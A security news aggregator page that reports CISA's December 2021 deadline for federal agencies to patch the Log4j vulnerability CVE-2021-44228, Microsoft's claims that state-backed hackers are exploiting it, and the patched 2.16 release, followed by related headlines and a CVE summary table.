Security News > 2021 > December > As CISA tells US govt agencies to squash Log4j bug by Dec 24, fingers start pointing at China, Iran, others
Microsoft reckons government cyber-spies in China, Iran, North Korea, and Turkey are actively exploiting the Log4j 2.x remote-code execution hole.
It's interesting this is coming to light as the US government's Cybersecurity and Infrastructure Security Agency tells all federal civilian agencies to take care of CVE-2021-44228 by December 24, 2021.
Version 2.16 of Log4j 2.x is available that disables the vulnerable functionality by default and removes the insecure message lookup code completely.
CISA has a bunch of useful resources here on GitHub, including a big list of affected software and products and related advisories - from Amazon cloud services to VMware tools.
"CISA is working closely with our public and private sector partners to proactively address a critical vulnerability affecting products containing the log4j software library," CISA Director Jen Easterly said over the weekend.
CISA says it is not aware of any US federal government agencies suffering a security breach from Log4j.
News URL
https://go.theregister.com/feed/www.theregister.com/2021/12/15/log4j_latest_cisa/
Related news
- China Possibly Hacking US “Lawful Access” Backdoor (source)
- China again claims Volt Typhoon cyber-attack crew was invented by the US to discredit it (source)
- China’s Spamouflage cranks up trolling of US Senator Rubio as election day looms (source)
- China's Volt Typhoon reportedly breached Singtel in 'test-run' for US telecom attacks (source)
- Reminder: China-backed crews compromised 'multiple' US telcos in 'significant cyber espionage campaign' (source)
- T-Mobile US 'monitoring' China's 'industry-wide attack' amid fresh security breach fears (source)
Related Vulnerability
| DATE | CVE | VULNERABILITY TITLE | RISK |
|---|---|---|---|
| 2021-12-10 | CVE-2021-44228 | Deserialization of Untrusted Data vulnerability in multiple products Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. network low complexity apache siemens intel debian fedoraproject sonicwall netapp cisco snowsoftware bentley percussion apple CWE-502 critical | 10.0 |